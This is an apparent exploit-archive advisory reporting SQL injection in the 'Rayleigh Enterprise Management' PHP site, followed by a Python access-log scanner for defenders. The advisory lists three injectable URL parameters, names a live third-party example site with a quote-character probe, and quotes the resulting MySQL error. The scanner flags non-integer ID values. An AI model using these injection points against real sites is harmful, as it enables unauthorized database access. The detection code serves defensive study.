Rayleigh Enterprise Management MiitBeianGovCn version 1.0 suffers from a remote SQL injection vulnerability.
5bc737bd5ad59bf16243287fd7b68654
###############################################################
# Exploit Title : Rayleigh Enterprise Management MiitBeianGovCn 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : miitbeian.gov.cn
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link : cyberizm.org/cyberizm-rayleigh-enterprise-management-delling-sql-injection.html
###############################################################
CopyRight © 2013 Rayleigh Enterprise Management
Technical Support Delling China SQL Injection Vulnerability
###############################################################
# Exploit : /aboutus.php?id=[ID-Number]&type=[SQL Injection]
# Exploit : /list.php?big_id=[ID-Number]&sec_id=[SQL Injection]
# Exploit : /cont.php?id=[ID-Number]&sec_id=[ID-Number]&big_id=[ID-Number]
###############################################################
# Example Site => relay2009.com/aboutus.php?id=1&type=1%27 => [ Proof of Concept for SQL Inj ] => archive.is/fEijr
# SQL/DB Error :
Error! info: Can not Select to MySQL server!
Script: /aboutus.php
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and language=0' at line 1 Errno.: 1064
###############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###############################################################
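Added example (not part of the original advisory or the vendor's code): a log check for defenders that flags requests to the three scripts listed above whenever one of the ID parameters is not a plain integer, which is also the validation rule the application should enforce before building its query. The combined access-log format, the 10-digit limit and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and ID parameters named in the advisory; all are expected to be integers.
NUMERIC_PARAMS = {
    "/aboutus.php": {"id", "type"},
    "/list.php": {"big_id", "sec_id"},
    "/cont.php": {"id", "sec_id", "big_id"},
}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed rule: 1 to 10 decimal digits, nothing else.
DIGITS_RE = re.compile(r"[0-9]{1,10}")


def suspicious_params(log_line):
    """Return [(param, decoded_value), ...] for non-integer ID values, else []."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # Lower-case the path: the advisory was tested on Windows (case-insensitive paths).
    expected = NUMERIC_PARAMS.get(url.path.lower())
    if expected is None:
        return []
    # parse_qsl percent-decodes values and keeps repeated or empty parameters.
    return [(k, v) for k, v in parse_qsl(url.query, keep_blank_values=True)
            if k in expected and not DIGITS_RE.fullmatch(v)]


def scan(lines):
    """Map 1-based line number to the suspicious parameters on that line."""
    results = ((n, suspicious_params(line)) for n, line in enumerate(lines, 1))
    return {n: hits for n, hits in results if hits}


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2018:10:00:01 +0000] "GET /aboutus.php?id=1&type=1 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/Dec/2018:10:00:05 +0000] "GET /aboutus.php?id=1&type=1%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [30/Dec/2018:10:00:09 +0000] "GET /list.php?big_id=2&sec_id=7 HTTP/1.1" 200 4096',
    '192.0.2.77 - - [30/Dec/2018:10:00:12 +0000] "GET /cont.php?id=3&sec_id=&big_id=2 HTTP/1.1" 200 298',
    '192.0.2.10 - - [30/Dec/2018:10:00:15 +0000] "GET /index.php?q=it%27s HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

The same integer-only rule, applied server-side together with parameterized queries, removes the CWE-89 condition reported for these parameters.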